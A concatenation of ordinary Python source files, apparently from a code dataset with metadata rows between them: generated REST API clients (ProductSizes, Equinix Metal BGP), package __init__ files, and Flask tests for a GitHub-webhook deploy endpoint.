"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_size_materials_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_size_materials_get`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/sizeMaterials'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'filter' in params:
query_params['filter'] = params['filter']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[ProductSizeMaterial]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_size_materials_post(self, id, **kwargs):
"""
Creates a new instance in sizeMaterials of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_size_materials_post(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param ProductSizeMaterial data:
:return: ProductSizeMaterial
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_size_materials_post_with_http_info(id, **kwargs)
else:
(data) = self.product_sizes_id_size_materials_post_with_http_info(id, **kwargs)
return data
def product_sizes_id_size_materials_post_with_http_info(self, id, **kwargs):
"""
Creates a new instance in sizeMaterials of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_size_materials_post_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param ProductSizeMaterial data:
:return: ProductSizeMaterial
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_size_materials_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_size_materials_post`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/sizeMaterials'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductSizeMaterial',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_type_get(self, id, **kwargs):
"""
Fetches belongsTo relation type.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_type_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param bool refresh:
:return: ProductType
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_type_get_with_http_info(id, **kwargs)
else:
(data) = self.product_sizes_id_type_get_with_http_info(id, **kwargs)
return data
def product_sizes_id_type_get_with_http_info(self, id, **kwargs):
"""
Fetches belongsTo relation type.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_type_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param bool refresh:
:return: ProductType
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'refresh']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_type_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_type_get`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/type'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'refresh' in params:
query_params['refresh'] = params['refresh']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductType',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_post(self, **kwargs):
"""
Create a new instance of the model and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_post(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param ProductSize data: Model instance data
:return: ProductSize
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_post_with_http_info(**kwargs)
else:
(data) = self.product_sizes_post_with_http_info(**kwargs)
return data
def product_sizes_post_with_http_info(self, **kwargs):
"""
Create a new instance of the model and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_post_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param ProductSize data: Model instance data
:return: ProductSize
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_post" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/ProductSizes'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductSize',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
| 41.601527
| 165
| 0.566486
| 18,026
| 174,352
| 5.247143
| 0.015644
| 0.062589
| 0.038484
| 0.028165
| 0.987577
| 0.986287
| 0.985262
| 0.980695
| 0.977671
| 0.97543
| 0
| 0.00073
| 0.348301
| 174,352
| 4,190
| 166
| 41.611456
| 0.831701
| 0.311324
| 0
| 0.847243
| 0
| 0
| 0.187194
| 0.073436
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037936
| false
| 0
| 0.003541
| 0
| 0.098128
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
22577442438a2350d5afcac3cedbaf633136177a
| 262
|
py
|
Python
|
acoular/demo/__init__.py
|
esarradj/acoular
|
ed73ab666f994421cfcf8d0b5310a563d99f5f40
|
[
"BSD-3-Clause"
] | 2
|
2018-02-04T10:31:31.000Z
|
2021-08-23T13:01:38.000Z
|
acoular/demo/__init__.py
|
haoshimaster/acoular
|
3f630abde2ffbe1183aefceba2c4f7faa586656a
|
[
"BSD-3-Clause"
] | null | null | null |
acoular/demo/__init__.py
|
haoshimaster/acoular
|
3f630abde2ffbe1183aefceba2c4f7faa586656a
|
[
"BSD-3-Clause"
] | null | null | null |
# coding=UTF-8
#------------------------------------------------------------------------------
# Copyright (c) 2007-2020, Acoular Development Team.
#------------------------------------------------------------------------------
from . import acoular_demo
| 37.428571
| 80
| 0.274809
| 14
| 262
| 5.071429
| 0.928571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0375
| 0.083969
| 262
| 7
| 81
| 37.428571
| 0.258333
| 0.835878
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
226c779a1ca28c2fd888640a543824091ba57f50
| 9,915
|
py
|
Python
|
tests/test_deploy/TestControllers.py
|
mukul-mehta/sample-platform
|
0fa9345ea46e44ae97aaa4f421e262d5afeca235
|
[
"0BSD"
] | null | null | null |
tests/test_deploy/TestControllers.py
|
mukul-mehta/sample-platform
|
0fa9345ea46e44ae97aaa4f421e262d5afeca235
|
[
"0BSD"
] | null | null | null |
tests/test_deploy/TestControllers.py
|
mukul-mehta/sample-platform
|
0fa9345ea46e44ae97aaa4f421e262d5afeca235
|
[
"0BSD"
] | null | null | null |
import json
from tempfile import gettempdir
from flask import g
from mock import mock
from mod_deploy.controllers import requests
from tests.base import (BaseTestCase, generate_git_api_header,
generate_signature)
WSGI_ENVIRONMENT = {'REMOTE_ADDR': '0.0.0.0'}
@mock.patch.object(requests, 'get')
class TestControllers(BaseTestCase):
def test_root(self, mock_request_get):
"""
Test the Root of mod_deploy.
"""
mock_request_get.return_value.json.return_value = {"hooks": ['0.0.0.0']}
response = self.app.test_client().get('/deploy', environ_overrides=WSGI_ENVIRONMENT)
self.assertEqual(response.status_code, 200)
self.assertIn("OK", str(response.data))
def test_headers_ping(self, mock_request_get):
"""
Test The View by sending a ping request.
"""
mock_request_get.return_value.json.return_value = {"hooks": ['0.0.0.0']}
sig = generate_signature(str(json.dumps({})).encode('utf-8'), g.github['ci_key'])
headers = generate_git_api_header('ping', sig)
response = self.app.test_client().post('/deploy', headers=headers, environ_overrides=WSGI_ENVIRONMENT)
self.assertEqual(response.status_code, 200)
self.assertIn("Hi", str(response.data))
def test_headers_missing_X_GitHub_Event(self, mock_request_get):
"""
Test missing X-GitHub-Event header.
"""
mock_request_get.return_value.json.return_value = {"hooks": ['0.0.0.0']}
sig = generate_signature(str(json.dumps({})).encode('utf-8'), g.github['ci_key'])
headers = generate_git_api_header('push', sig)
headers.remove('X-GitHub-Event')
response = self.app.test_client().post('/deploy', headers=headers, environ_overrides=WSGI_ENVIRONMENT)
self.assertEqual(response.status_code, 418)
def test_headers_missing_X_GitHub_Delivery(self, mock_request_get):
"""
Test missing X-GitHub-Delivery header.
"""
mock_request_get.return_value.json.return_value = {"hooks": ['0.0.0.0']}
sig = generate_signature(str(json.dumps({})).encode('utf-8'), g.github['ci_key'])
headers = generate_git_api_header('push', sig)
headers.remove('X-GitHub-Delivery')
response = self.app.test_client().post('/deploy', headers=headers, environ_overrides=WSGI_ENVIRONMENT)
self.assertEqual(response.status_code, 418)
def test_headers_missing_X_Hub_Signature(self, mock_request_get):
"""
Test missing X-Hub-Signature header.
"""
mock_request_get.return_value.json.return_value = {"hooks": ['0.0.0.0']}
sig = generate_signature(str(json.dumps({})).encode('utf-8'), g.github['ci_key'])
headers = generate_git_api_header('push', sig)
headers.remove('X-Hub-Signature')
response = self.app.test_client().post('/deploy', headers=headers, environ_overrides=WSGI_ENVIRONMENT)
self.assertEqual(response.status_code, 418)
def test_headers_missing_User_Agent(self, mock_request_get):
"""
Test missing User-Agent header.
"""
mock_request_get.return_value.json.return_value = {"hooks": ['0.0.0.0']}
sig = generate_signature(str(json.dumps({})).encode('utf-8'), g.github['ci_key'])
headers = generate_git_api_header('push', sig)
headers.remove('User-Agent')
response = self.app.test_client().post('/deploy', headers=headers, environ_overrides=WSGI_ENVIRONMENT)
self.assertEqual(response.status_code, 418)
def test_headers_invalid_User_Agent(self, mock_request_get):
"""
Test invalid user-agent beginning.
"""
mock_request_get.return_value.json.return_value = {"hooks": ['0.0.0.0']}
sig = generate_signature(str(json.dumps({})).encode('utf-8'), g.github['ci_key'])
headers = generate_git_api_header('push', sig)
headers['User-Agent'] = "invalid"
response = self.app.test_client().post('/deploy', headers=headers, environ_overrides=WSGI_ENVIRONMENT)
self.assertEqual(response.status_code, 418)
def test_headers_event_not_push(self, mock_request_get):
"""
Test The View by sending an event other than push.
"""
mock_request_get.return_value.json.return_value = {"hooks": ['0.0.0.0']}
sig = generate_signature(str(json.dumps({})).encode('utf-8'), g.github['ci_key'])
headers = generate_git_api_header('pull', sig)
response = self.app.test_client().post('/deploy', headers=headers, environ_overrides=WSGI_ENVIRONMENT)
self.assertEqual(response.status_code, 200)
self.assertIn("Wrong event", str(response.data))
@mock.patch('mod_deploy.controllers.is_valid_signature', return_value=False)
@mock.patch('mod_deploy.controllers.g')
def test_headers_invalid_signature_event(self, mock_g, mock_valid_sign, mock_request_get):
"""
Test the view by sending a valid event.
"""
mock_request_get.return_value.json.return_value = {"hooks": ['0.0.0.0']}
self.app.config['INSTALL_FOLDER'] = gettempdir()
data = {
'ref': 'refs/heads/master'
}
sig = generate_signature(str(json.dumps(data)).encode('utf-8'), g.github['ci_key'])
headers = generate_git_api_header('push', sig)
with self.app.test_client() as client:
response = client.post(
'/deploy', environ_overrides=WSGI_ENVIRONMENT,
data=json.dumps(data), headers=headers
)
self.assertEqual(response.status_code, 418)
mock_valid_sign.assert_called_once()
mock_g.log.warning.assert_called_once()
mock_request_get.assert_called_once_with('https://api.github.com/meta?client_id=&client_secret=')
@mock.patch('mod_deploy.controllers.is_valid_signature', return_value=True)
@mock.patch('mod_deploy.controllers.g')
def test_headers_no_payload_event(self, mock_g, mock_valid_sign, mock_request_get):
"""
Test the view by sending a valid event.
"""
mock_request_get.return_value.json.return_value = {"hooks": ['0.0.0.0']}
self.app.config['INSTALL_FOLDER'] = gettempdir()
data = None
sig = generate_signature(str(json.dumps(data)).encode('utf-8'), g.github['ci_key'])
headers = generate_git_api_header('push', sig)
with self.app.test_client() as client:
response = client.post(
'/deploy', environ_overrides=WSGI_ENVIRONMENT,
data=json.dumps(data), headers=headers
)
self.assertEqual(response.status_code, 418)
mock_valid_sign.assert_called_once()
mock_g.log.warning.assert_called_once()
mock_request_get.assert_called_once_with('https://api.github.com/meta?client_id=&client_secret=')
@mock.patch('mod_deploy.controllers.is_valid_signature', return_value=True)
@mock.patch('mod_deploy.controllers.g')
def test_headers_not_master_event(self, mock_g, mock_valid_sign, mock_request_get):
"""
Test the view by sending a valid event.
"""
mock_request_get.return_value.json.return_value = {"hooks": ['0.0.0.0']}
self.app.config['INSTALL_FOLDER'] = gettempdir()
data = {
'ref': 'refs/heads/not_master'
}
sig = generate_signature(str(json.dumps(data)).encode('utf-8'), g.github['ci_key'])
headers = generate_git_api_header('push', sig)
with self.app.test_client() as client:
response = client.post(
'/deploy', environ_overrides=WSGI_ENVIRONMENT,
data=json.dumps(data), headers=headers
)
self.assertEqual(response.status_code, 200)
self.assertIn('Not master', str(response.data))
mock_valid_sign.assert_called_once()
mock_g.log.warning.assert_not_called()
mock_request_get.assert_called_once_with('https://api.github.com/meta?client_id=&client_secret=')
@mock.patch('mod_deploy.controllers.Repo')
@mock.patch('mod_deploy.controllers.is_valid_signature', return_value=True)
@mock.patch('mod_deploy.controllers.subprocess.Popen')
@mock.patch('mod_deploy.controllers.copyfile')
@mock.patch('mod_deploy.controllers.open')
def test_headers_valid_event(self, mock_open, mock_copy, mock_subprocess,
mock_valid_sign, mock_repo, mock_request_get):
"""
Test the view by sending a valid event.
"""
mock_request_get.return_value.json.return_value = {"hooks": ['0.0.0.0']}
self.app.config['INSTALL_FOLDER'] = gettempdir()
data = {
'ref': 'refs/heads/master'
}
sig = generate_signature(str(json.dumps(data)).encode('utf-8'), g.github['ci_key'])
headers = generate_git_api_header('push', sig)
# set return for mock_repo
class mock_pull:
from collections import namedtuple
flags = 128
commit_obj = namedtuple('commit_obj', ['hexsha'])
commit = commit_obj('somesha')
mock_repo.return_value.remote.return_value.fetch.return_value = "valid fetch"
mock_repo.return_value.remote.return_value.pull.return_value = [mock_pull]
with self.app.test_client() as client:
response = client.post(
'/deploy', environ_overrides=WSGI_ENVIRONMENT,
data=json.dumps(data), headers=headers
)
self.assertEqual(response.status_code, 200)
mock_repo.assert_called_once()
mock_open.assert_called_once_with('build_commit.py', 'w')
mock_copy.assert_called_once()
mock_subprocess.assert_called_once_with(["sudo", "service", "platform", "reload"])
self.assertIn("somesha", response.data.decode('utf-8'))
| 43.296943
| 110
| 0.656682
| 1,263
| 9,915
| 4.884402
| 0.110055
| 0.012644
| 0.061274
| 0.008429
| 0.825742
| 0.811315
| 0.793484
| 0.766899
| 0.753283
| 0.733668
| 0
| 0.013161
| 0.210691
| 9,915
| 228
| 111
| 43.486842
| 0.775109
| 0.048916
| 0
| 0.592105
| 1
| 0
| 0.135256
| 0.041626
| 0
| 0
| 0
| 0
| 0.197368
| 1
| 0.078947
| false
| 0
| 0.046053
| 0
| 0.138158
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3f6e78f93977eefdbfad80918679eec8b817dcc3
| 1,011
|
py
|
Python
|
LocalitySensitiveHashing-1.0.1/LocalitySensitiveHashing/__init__.py
|
kanihal/CS631_pg_semantic_search
|
c394783dd2149045e358a47fa6e1313493e23510
|
[
"BSD-3-Clause"
] | null | null | null |
LocalitySensitiveHashing-1.0.1/LocalitySensitiveHashing/__init__.py
|
kanihal/CS631_pg_semantic_search
|
c394783dd2149045e358a47fa6e1313493e23510
|
[
"BSD-3-Clause"
] | null | null | null |
LocalitySensitiveHashing-1.0.1/LocalitySensitiveHashing/__init__.py
|
kanihal/CS631_pg_semantic_search
|
c394783dd2149045e358a47fa6e1313493e23510
|
[
"BSD-3-Clause"
] | 1
|
2020-10-20T11:48:08.000Z
|
2020-10-20T11:48:08.000Z
|
#!/usr/bin/env python
import sys
if sys.version_info[0] == 3:
from LocalitySensitiveHashing.LocalitySensitiveHashing import __version__
from LocalitySensitiveHashing.LocalitySensitiveHashing import __author__
from LocalitySensitiveHashing.LocalitySensitiveHashing import __date__
from LocalitySensitiveHashing.LocalitySensitiveHashing import __url__
from LocalitySensitiveHashing.LocalitySensitiveHashing import __copyright__
from LocalitySensitiveHashing.LocalitySensitiveHashing import LocalitySensitiveHashing
from LocalitySensitiveHashing.LocalitySensitiveHashing import DataGenerator
else:
from LocalitySensitiveHashing import __version__
from LocalitySensitiveHashing import __author__
from LocalitySensitiveHashing import __date__
from LocalitySensitiveHashing import __url__
from LocalitySensitiveHashing import __copyright__
from LocalitySensitiveHashing import LocalitySensitiveHashing
from LocalitySensitiveHashing import DataGenerator
| 37.444444
| 90
| 0.85361
| 76
| 1,011
| 10.815789
| 0.25
| 0.476886
| 0.442822
| 0.493917
| 0.829684
| 0
| 0
| 0
| 0
| 0
| 0
| 0.002268
| 0.127596
| 1,011
| 26
| 91
| 38.884615
| 0.929705
| 0.019782
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.882353
| 0
| 0.882353
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
451714fed57fbe27dcfe6002bf953522128f161d
| 148
|
py
|
Python
|
exif/tests/get_file_baselines/__init__.py
|
ArgiesDario/exif
|
62082954e9f7596f0911041b33d835e3df76e306
|
[
"MIT"
] | null | null | null |
exif/tests/get_file_baselines/__init__.py
|
ArgiesDario/exif
|
62082954e9f7596f0911041b33d835e3df76e306
|
[
"MIT"
] | null | null | null |
exif/tests/get_file_baselines/__init__.py
|
ArgiesDario/exif
|
62082954e9f7596f0911041b33d835e3df76e306
|
[
"MIT"
] | null | null | null |
"""Baseline strings for test_get_file tests."""
from exif.tests.get_file_baselines.modified_noise_file_hex import MODIFIED_NOISE_FILE_HEX_BASELINE
| 37
| 98
| 0.864865
| 23
| 148
| 5.086957
| 0.608696
| 0.119658
| 0.290598
| 0.34188
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.067568
| 148
| 3
| 99
| 49.333333
| 0.847826
| 0.277027
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1898d322db9077e258175f73e5d50784a6fa2c22
| 59,514
|
py
|
Python
|
metal/models/bgp_api.py
|
displague/metal-python
|
96e64e9ac41025d85ff6f61693165e29e1c366db
|
[
"MIT"
] | null | null | null |
metal/models/bgp_api.py
|
displague/metal-python
|
96e64e9ac41025d85ff6f61693165e29e1c366db
|
[
"MIT"
] | 3
|
2021-09-27T05:10:36.000Z
|
2021-09-27T06:10:57.000Z
|
metal/models/bgp_api.py
|
displague/metal-python
|
96e64e9ac41025d85ff6f61693165e29e1c366db
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Metal API
This is the API for Equinix Metal. The API allows you to programmatically interact with all of your Equinix Metal resources, including devices, networks, addresses, organizations, projects, and your user account. The official API docs are hosted at <https://metal.equinix.com/developers/api>. # noqa: E501
The version of the OpenAPI document: 1.0.0
Contact: support@equinixmetal.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from metal.api_client import ApiClient
from metal.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class BGPApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_bgp_session(self, id, bgp_session, **kwargs): # noqa: E501
"""Create a BGP session # noqa: E501
Creates a BGP session. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_bgp_session(id, bgp_session, async_req=True)
>>> result = thread.get()
:param id: Device UUID (required)
:type id: str
:param bgp_session: BGP session to create (required)
:type bgp_session: BGPSessionInput
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: BgpSession
"""
kwargs['_return_http_data_only'] = True
return self.create_bgp_session_with_http_info(id, bgp_session, **kwargs) # noqa: E501
def create_bgp_session_with_http_info(self, id, bgp_session, **kwargs): # noqa: E501
"""Create a BGP session # noqa: E501
Creates a BGP session. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_bgp_session_with_http_info(id, bgp_session, async_req=True)
>>> result = thread.get()
:param id: Device UUID (required)
:type id: str
:param bgp_session: BGP session to create (required)
:type bgp_session: BGPSessionInput
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(BgpSession, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id',
'bgp_session'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_bgp_session" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `create_bgp_session`") # noqa: E501
# verify the required parameter 'bgp_session' is set
if self.api_client.client_side_validation and ('bgp_session' not in local_var_params or # noqa: E501
local_var_params['bgp_session'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `bgp_session` when calling `create_bgp_session`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'bgp_session' in local_var_params:
body_params = local_var_params['bgp_session']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {
201: "BgpSession",
401: "Error",
403: "Error",
422: "Error",
}
return self.api_client.call_api(
'/devices/{id}/bgp/sessions', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def delete_bgp_session(self, id, **kwargs): # noqa: E501
"""Delete the BGP session # noqa: E501
Deletes the BGP session. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_bgp_session(id, async_req=True)
>>> result = thread.get()
:param id: BGP session UUID (required)
:type id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
kwargs['_return_http_data_only'] = True
return self.delete_bgp_session_with_http_info(id, **kwargs) # noqa: E501
def delete_bgp_session_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete the BGP session # noqa: E501
Deletes the BGP session. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_bgp_session_with_http_info(id, async_req=True)
